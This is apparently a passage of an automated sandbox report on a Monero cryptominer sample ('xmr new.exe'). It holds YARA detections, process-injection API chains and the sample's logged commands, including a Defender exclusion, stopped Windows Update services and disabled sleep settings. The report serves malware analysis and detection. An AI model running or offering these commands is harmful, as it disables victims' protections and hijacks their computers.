        Source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
        Source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: lsass.exe, 00000025.00000002.2799238553.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2799573161.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
        Source: lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2799573161.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2797579376.000002A290A88000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: lsass.exe, 00000025.00000000.1535520603.000002A290AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2797726215.000002A290AC4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
        Source: lsass.exe, 00000025.00000002.2797238562.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535320717.000002A290A4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
        Source: lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2799238553.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535320717.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2799573161.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
        Source: lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2797579376.000002A290A88000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
        Source: lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
        Source: lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2797238562.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535320717.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
        Source: lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
        Source: lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
        Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Uses powercfg.exe to modify the power settings
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC28C8 NtEnumerateValueKey,NtEnumerateValueKey,31_2_000001F385BC28C8
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A29199202C NtQuerySystemInformation,StrCmpNIW,37_2_000002A29199202C
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A29199253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,37_2_000002A29199253C
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F528C8 NtEnumerateValueKey,NtEnumerateValueKey,42_2_00000283E0F528C8
        Source: C:\Windows\System32\dialer.exeCode function: 63_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,63_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exeCode function: 65_2_0000000140001394 NtOpenKeyTransactedEx,65_2_0000000140001394
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeFile created: C:\Windows\TEMP\zhgmaxoaawxc.sysJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_ctadsvif.1ug.ps1Jump to behavior
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C25_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400014D825_2_00000001400014D8
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000256025_2_0000000140002560
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BA38A831_2_000001F385BA38A8
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385B9D0E031_2_000001F385B9D0E0
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385B91F2C31_2_000001F385B91F2C
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BD44A831_2_000001F385BD44A8
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCDCE031_2_000001F385BCDCE0
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC2B2C31_2_000001F385BC2B2C
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BFD0E031_2_000001F385BFD0E0
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385C038A831_2_000001F385C038A8
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BF1F2C31_2_000001F385BF1F2C
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A2911C1F2C37_2_000002A2911C1F2C
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A2911D38A837_2_000002A2911D38A8
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A2911CD0E037_2_000002A2911CD0E0
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A291992B2C37_2_000002A291992B2C
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A2919A44A837_2_000002A2919A44A8
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A29199DCE037_2_000002A29199DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E255DD0E040_2_0000014E255DD0E0
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E255E38A840_2_0000014E255E38A8
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E255D1F2C40_2_0000014E255D1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDDCE040_2_0000014E25EDDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EE44A840_2_0000014E25EE44A8
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25ED2B2C40_2_0000014E25ED2B2C
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F21F2C42_2_00000283E0F21F2C
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F2D0E042_2_00000283E0F2D0E0
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F338A842_2_00000283E0F338A8
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F52B2C42_2_00000283E0F52B2C
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F5DCE042_2_00000283E0F5DCE0
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F644A842_2_00000283E0F644A8
        Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000226C63_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 63_2_00000001400014D863_2_00000001400014D8
        Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000256063_2_0000000140002560
        Source: C:\Windows\System32\dialer.exeCode function: 65_2_000000014000324065_2_0000000140003240
        Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001400027D065_2_00000001400027D0
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539A38A867_2_000001FB539A38A8
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB5399D0E067_2_000001FB5399D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB53991F2C67_2_000001FB53991F2C
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539D44A867_2_000001FB539D44A8
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539CDCE067_2_000001FB539CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539C2B2C67_2_000001FB539C2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BB38A868_2_000001CBD8BB38A8
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BAD0E068_2_000001CBD8BAD0E0
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BA1F2C68_2_000001CBD8BA1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BE44A868_2_000001CBD8BE44A8
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BDDCE068_2_000001CBD8BDDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BD2B2C68_2_000001CBD8BD2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD13D0E069_2_000001F2BD13D0E0
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD1438A869_2_000001F2BD1438A8
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD131F2C69_2_000001F2BD131F2C
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD16DCE069_2_000001F2BD16DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD1744A869_2_000001F2BD1744A8
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD162B2C69_2_000001F2BD162B2C
        Source: Joe Sandbox ViewDropped File: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
        Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\zhgmaxoaawxc.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@90/12@4/1
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,63_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,25_2_00000001400019C4
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3184:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2292:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4380:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3128:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5696:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1820:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1096:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1080:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3108:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4436:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2572:120:WilError_03
        Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\fmfuvuvubhulhbmi
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5508:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4316:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkd1lcwd.bin.ps1Jump to behavior
        Source: xmr new.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Users\user\Desktop\xmr new.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: xmr new.exeReversingLabs: Detection: 73%
        Source: C:\Users\user\Desktop\xmr new.exeFile read: C:\Users\user\Desktop\xmr new.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\xmr new.exe "C:\Users\user\Desktop\xmr new.exe"
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
